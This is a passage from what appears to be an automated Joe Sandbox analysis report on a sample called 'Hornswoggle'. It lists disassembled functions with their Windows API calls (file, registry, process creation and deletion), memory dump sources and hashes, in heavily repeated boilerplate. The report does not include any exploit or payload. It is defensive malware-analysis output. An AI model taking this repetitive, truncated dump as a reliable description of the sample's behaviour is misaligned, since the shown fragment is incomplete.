                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                        • Instruction ID: d3a2940f28ad1956632bfd73bee9eff7b9b7c3d901c1c2bf8e917ae235022c86
                                                        • Opcode Fuzzy Hash: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                        • Instruction Fuzzy Hash: 2D713471E00228DBDF24CFA9C8547ADBBB1FF44305F15806AD816BB281C778AA96DF54
                                                        Function 0040686B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                        • Instruction ID: aa5f261e6b50ba4db5ffebf04d3efdb0ff665d1262494a5322ec58a673e68ddc
                                                        • Opcode Fuzzy Hash: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                        • Instruction Fuzzy Hash: 91715671E00228DBDF28CF99C854BADBBB1FF44305F15806AD816BB281C778A992DF54
                                                        Function 004067B7 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                        • Instruction ID: ff328c296e0f6909f1720754cbeef76fe0f6b635d5236ea2459b9db161edb35a
                                                        • Opcode Fuzzy Hash: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                        • Instruction Fuzzy Hash: 9F715771E00228DBEF28CF99C8547ADBBB1FF44305F15806AD856BB281C778AA56DF44
                                                        Function 00403064 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00403078
                                                          • Part of subcall function 004031E3: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 004030AB
                                                        • SetFilePointer.KERNELBASE(0039CC6B,00000000,00000000,004128D8,00004000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000), ref: 004031A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FilePointer$CountTick
                                                        • String ID:
                                                        • API String ID: 1092082344-0
                                                        • Opcode ID: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
                                                        • Instruction ID: 32da71d67e65fe5252f8ded7d9303c2dcf981c5e4867c3c67dada36b4a4d5a13
                                                        • Opcode Fuzzy Hash: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
                                                        • Instruction Fuzzy Hash: DD31B2B29012109FDB10BF2AFE4086A3BECE748356715823BE400B62E0C739DD52DB5E
                                                        Function 004021D2 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00406167: FindFirstFileA.KERNELBASE(76003410,00421580,C:\,00405A06,C:\,C:\,00000000,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0), ref: 00406172
                                                          • Part of subcall function 00406167: FindClose.KERNEL32(00000000), ref: 0040617E
                                                        • lstrlenA.KERNEL32 ref: 00402212
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040221C
                                                        • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402244
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                                        • String ID:
                                                        • API String ID: 1486964399-0
                                                        • Opcode ID: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
                                                        • Instruction ID: 708f0fc9269f5af075d905106071f31bae39c4f67462bfddc0a38c2d79fef8c9
                                                        • Opcode Fuzzy Hash: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
                                                        • Instruction Fuzzy Hash: FE112171904318AADB10EFB58945A9EB7F8AF14318F10853BA505FB2D2D6BCC9448B59
                                                        Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                          • Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000), ref: 004050D8
                                                          • Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\), ref: 004050EA
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                          • Part of subcall function 004055F4: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
                                                          • Part of subcall function 004055F4: CloseHandle.KERNEL32(?), ref: 0040562A
                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 3521207402-0
                                                        • Opcode ID: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
                                                        • Instruction ID: 8164f88ac99e46b686dec60b6f66323921365fc284b2c72d55c18730983d64c3
                                                        • Opcode Fuzzy Hash: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
                                                        • Instruction Fuzzy Hash: 97015731904114EBDF11AFA1C98899F7BB2EF00344F20817BF601B52E1C7789A419B9A
                                                        Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnA627.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseOpenValue
                                                        • String ID:
                                                        • API String ID: 167947723-0
                                                        • Opcode ID: 47ab25418fb38c8c5b03f0ebc620af0af5168f3c50133958f6b2384b9cd533c1
                                                        • Instruction ID: e09e8e067f2b8771eb66943483239aed03eb61d96520190a1401bf15a77a7747
                                                        • Opcode Fuzzy Hash: 47ab25418fb38c8c5b03f0ebc620af0af5168f3c50133958f6b2384b9cd533c1
                                                        • Instruction Fuzzy Hash: BAF0AD72A04200BFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B84A459A7A
                                                        Function 004056BD Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00405AB1: GetFileAttributesA.KERNELBASE(?,?,004056C9,?,?,00000000,004058AC,?,?,?,?), ref: 00405AB6
                                                          • Part of subcall function 00405AB1: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405ACA
                                                        • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,004058AC), ref: 004056D8
                                                        • DeleteFileA.KERNELBASE(?,?,?,00000000,004058AC), ref: 004056E0
                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 004056F8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: File$Attributes$DeleteDirectoryRemove
                                                        • String ID:
                                                        • API String ID: 1655745494-0
                                                        • Opcode ID: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
                                                        • Instruction ID: 7218464210d320bbb7aaa7b2b3498e6226de7d0fc9260b199a665c24177db626
                                                        • Opcode Fuzzy Hash: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
                                                        • Instruction Fuzzy Hash: 4FE0E53150EA9157C2105731990C75F6AD8DF86324F840E36F955B21D0D7B94C068EAE
                                                        Function 00402F5C Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 00402F81
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
                                                        • Instruction ID: 983d4f283b3a49842741e08d62faa859851885946f81c7e75766fedec90a3088
                                                        • Opcode Fuzzy Hash: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
                                                        • Instruction Fuzzy Hash: 32319F70202219EFDF20EF56DD44A9B7BACEB00755F20803AF904E61D0D279DE40DBA9
                                                        Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnA627.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 408be7f7af0432980abd1dac26f88ffd518e424ecbfe51417bc02b193546086b
                                                        • Instruction ID: ea61b96732c3ecdd8e38099917432d45b641eb3d8d4d3075f09eb17731070f47
                                                        • Opcode Fuzzy Hash: 408be7f7af0432980abd1dac26f88ffd518e424ecbfe51417bc02b193546086b
                                                        • Instruction Fuzzy Hash: 7111A771905205FFDF14DF64C6889AEBBB4EF11349F20847FE141B62C0D2B84A45DB5A
                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
                                                        • Instruction ID: 8ec6bfb8ef4f3ff43576048fe9568e939b5e998f238dec90285f5c94a9fc96e2
                                                        • Opcode Fuzzy Hash: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
                                                        • Instruction Fuzzy Hash: 2201F431B24210ABE7294B389E04B6A36A8F710314F11823BF911F66F1D7B8DC029B4D
                                                        Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteOpenValue
                                                        • String ID:
                                                        • API String ID: 849931509-0
                                                        • Opcode ID: 640ef84aaa5a4d1c7ae329859e4cea83c356e8d6a4fc0d45da6cfdbf294ae742
                                                        • Instruction ID: 87e18c8b9cd74d0bde17796df308dc93964f3544418e05dee947639aacfbea4d
                                                        • Opcode Fuzzy Hash: 640ef84aaa5a4d1c7ae329859e4cea83c356e8d6a4fc0d45da6cfdbf294ae742
                                                        • Instruction Fuzzy Hash: 4CF04473A00110AFDB10BFA48A4EAAE76799B50345F14443BF201B61C1D9BD4D12866D
                                                        Function 0040514E Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                        Download Yara Rule
                                                        APIs
